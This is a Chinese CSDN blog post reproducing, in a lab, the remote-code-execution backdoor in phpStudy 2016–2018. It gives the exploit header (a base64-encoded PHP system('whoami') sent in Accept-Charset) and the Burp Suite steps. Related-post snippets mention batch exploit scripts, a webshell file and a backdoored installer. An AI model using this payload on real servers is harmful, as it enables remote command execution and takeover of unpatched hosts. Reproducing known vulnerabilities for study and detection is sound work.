phpstudy_2016-2018_rce_backdoor后门漏洞复现

于 2023-10-16 16:54:14 发布
阅读量278 收藏
点赞数 4
文章标签: web安全 网络安全 服务器 运维 linux php 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58683895/article/details/133862429
版权

phpstudy_2016-2018_rce_backdoor复现

漏洞描述

  • 攻击者可以利用该漏洞执行PHP 命令,也可以称作phpStudy 后门。

  • RCE,Remote Command| Code Execute。

影响版本

  • phpStudy 2016
  • phpStudy 2018

利用代码

Accept-Charset: (命令的base64编码,例如system("whoami");进行编码)
Accept-Encoding: gzip,deflate #此处删除中间的空格

实现过程

  • 此处使用的windows_server2016开启phpstudy,版本号为5.4.45
  • 选择非服务模式

image-20231016164245092

  • 打开kali的burpsuite,选中proxy模块,选择打开浏览器
  • 进入浏览器后访问php页面

image-20231016164635457

  • 点击HTTP history查看刚才的页面(有响应的),然后右键点击或者ctrl+r发送给repeater模块

  • 将图中reque框选部分改为如图,随后发送即可执行命令

  • 删除delate前空格,添加Accept-Charset:信息

  • 将所需执行命令base64编码

    system("whoami");
to base64
c3lzdGVtKCJ3aG9hbWkiKTs=

image-20231016165111940

image-20231016164942364

order libra
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
phpstudy后门简单分析
fa1lr4in的小博客
09-25 1708
感谢pcat师傅的文章:https://mp.weixin.qq.com/s/dIDfgFxHlqenKRUSW7Oqkw 20号得知phphstudy有后门,不知道官网的是不是也被入侵了,当时没有进行查看,,,由于当时正在秋招面试比较忙,鸽了几天有了下文: 被中马的为php_xmlrpc.dll这个dll文件,这个可以通过查找泄露字符串很容易通过脚本实,就不贴了,可以以eval为关键...
PHP常见后门,phpStudy后门RCE,/批量脚本/修
weixin_33416318的博客
03-10 618
phpStudy后门介绍phpStudy是国内一款免费的PHP环境集成包,集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer等多款软件,无需配置即可直接安装使用,有着近百万PHP用户。近日被爆出phpStudy存在RCE后门,并通过验证。软件作者声明:phpstudy 2016版PHP5.4存在后门。实际测试官网下载phpstudy2018版php-5.2....
php_backdoor.php
06-11
大马文件
https phpstudy_有染PHPStudy_BackDoor
weixin_39923945的博客
11-29 210
前不久PHPStudy几乎要被玩坏,几乎没有什么技术水准的利用方式,破坏性却是巨大的。笔者亦是PHPStudy的铁粉,果不其然手头的服务器全部沦陷,心疼自己一秒,好在相关人员已经落网,这份长达多年的闹剧终于画上了个句号。从一个渗透测试工作者角度出发,我们来后知后觉的探究下这个后门的利用方式,来引起警示并帮助同为PHPStudy铁粉的用户进行批量快速的自己检测以即使的发并修漏洞。不管是...
php批量发包,phpstudy后门rce批量利用脚本的实
weixin_39826089的博客
04-01 277
写两个一个批量检测的 一个交互式shell的暂时py 图形化的qt写出来..有点问题后门包 :GET / HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0Accept: text/html,application/xhtm...
php批量发包,phpstudy后门rce批量利用脚本
weixin_42557656的博客
04-01 168
写两个一个批量检测的 一个交互式shell的暂时py 图形化的qt写出来..有点问题后门包 :GET / HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0Accept: text/html,application/x...
phpStudy_2016.11.03后门版.zip
09-29
在本例中,"phpStudy_2016.11.03后门版.zip"是一个包含了可能含有恶意后门的PHP开发环境——phpStudy的版本。phpStudy是一款广泛使用的集成PHP开发环境,它集成了Apache服务器、MySQL数据库以及PHP等组件,方便...
phpStudy_install_phpStudy_install
09-20
【phpStudy安装详解】 phpStudy是一款非常流行的PHP开发环境集成包,它包含了PHP、Apache、MySQL等组件,方便开发者在Windows环境下快速搭建Web服务器。在本文中,我们将深入探讨phpStudy的安装过程及其核心功能,...
phpstudy_2016.11.03.zip
03-14
phpstudy_2016.11.03这个压缩包中,包含了PHPStudy的主要组件和相关配置文件。用户解压后,可以找到phpStudy.exe主程序,通过双击运行,即可启动PHPStudy的控制台。控制台界面简洁明了,提供了如新建网站、修改...
phpstudy_rce.py
10-11
phpstudy_rce
phpStudy_32.7z
08-11
“phpstudy官网链接.url”是phpStudy官方网站的快捷方式,用户可以通过访问官网获取最新版本、更新信息、技术支持以及社区资源。官网通常会提供详细的教程、常见问题解答和用户反馈通道。 六、实战应用 在实际开发...
PHPStudy后门事件分析
weixin_30872337的博客
09-24 623
PHP环境集成程序包phpStudy被公告疑似遭遇供应链攻击,程序包自带PHP的php_xmlrpc.dll模块隐藏有后门。经过分析除了有反向连接木马之外,还可以正向执行任意php代码。 影响版本 Phpstudy 2016 php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll Phpstudy 20...
vulhub 8.1-backdoor漏洞
m0_46371267的博客
02-28 3912
漏洞描述 PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。 漏洞危害 攻击者可以通过user-agent来执行恶意代码获取重要信息。 漏洞等级 高危 ★★★★ 影响范围 PHP 8.1.0-dev 加固方法 建议参考官方公告及时升级或安装相应补丁。 参考链接: https://news-web.php.net/php.internals/113838 https://github.co
PhpStudy BackDoor 2019漏洞
qq_45521281的博客
05-05 4295
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 基础介绍 事件背景 北京时间9月20日,杭州公安发布《杭州警方通报打击涉网违法犯罪暨‘净网2019’专项行动战果》一文,文章曝光了国内知名PHP调试环境程序集成包“PhpStudy软件”遭到黑客篡改并植入“后门”。截至案发,近百万PHP用户中超过67万用户已被黑客控...
PhpStudy2016-2018-RCE 漏洞
最新发布
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-14 1219
Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。这是常用来写webshell的一句话,请注意使用这样的代码是非常危险的,因为它允许任意的命令执行和操纵服务器文件系统。需要注意的是,该漏洞只影响使用了特定版本的PHPStudy软件的系统,具体来说是2018年1月至2019年5月发布的版本。通过利用该漏洞,攻击者可以执行任意的PHP代码,从而完全控制受影响的系统。
phpStudy backdoor 2019后门漏洞过程记录
牛奶栗的小博客
11-11 877
1)可以通过查看路径为PHPTutorial/php/php-5.4.45/ext/php_xmlrpc.dll的文件,查找到@eval(%s('%s'));4、打开Burpsuite抓phpinfo.php页面的请求包,发送到Repeater重放器模块。部署在win10虚拟机里,解压后运行后访问localhost/phpinfo.php即成功安装。3)查看php.ini文件,检索到extension=php_xmlrpc.dll。2)查看php探针→PHP已编译模块检测,存在xmlrpc。
PhpStudy后门漏洞实战
la-大白
10-28 4795
phpstudy后门漏洞
渗透测试靶机vulnhub——DC5实战笔记
qq_56426046的博客
03-21 1537
将第一部分的c语言代码另存为libhax.c文件 然后gcc编译:gcc -fPIC -shared -ldl -o libhax.so libhax.c。将第二部分的C语言代码写入rootshell文件中,并编译成rooshell文件,然后删除rootshell.c文件。为dc5.sh增加可执行权限,执行dc5.sh文件,成功获取到root权限。Nginx日志地址/var/log/nginx/access.log。利用文件包含漏洞写马到日志文件中,最后包含日志文件获得shell。开放80,111端口。
2018pupstudy后门漏洞
D1stiny的博客
05-07 375
漏洞:程序包自带的PHP的php_xmlrpc.dll模块中有隐藏后门,使用gzuncompress函数进行免杀(IDA可查)影响版本如下 phpStudy20180211版本php5.4.45与php5.2.17ext扩展文件夹下的php_xmlrpc.dll phpStudy20161103版本php5.4.45与php5.2.17ext扩展文件夹下的php_xmlrpc.dll php.i...
phpstudy sql_mode=only_full_group_by -advertisement
04-30
phpstudy sql_mode=only_full_group_by -advertisement是指在phpstudy中设置MySQL的sql_mode为only_full_group_by,这个模式可以使MySQL在执行GROUP BY语句时更加严格。 在MySQL执行GROUP BY语句时,会将相同的行分组并统计,但有时在分组的字段中可能有一些非空的空值,这时MySQL在默认情况下会将这些空值也视作相同的值进行分组并统计,这可能会导致统计结果出错误。 而only_full_group_by模式可以在分组时排除空值,只对真正有值的字段进行分组和统计,这样可以确保统计结果的正确性。 然而,启用only_full_group_by模式会使MySQL对语句执行更多的检查和计算,降低了查询的效率,因此在一些MySQL版本中默认关闭了这个模式。如果需要启用,需要手动设置sql_mode为包含only_full_group_by的值。 至于-advertisement部分,可能是意味着这是一条非广告的信息或公告。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值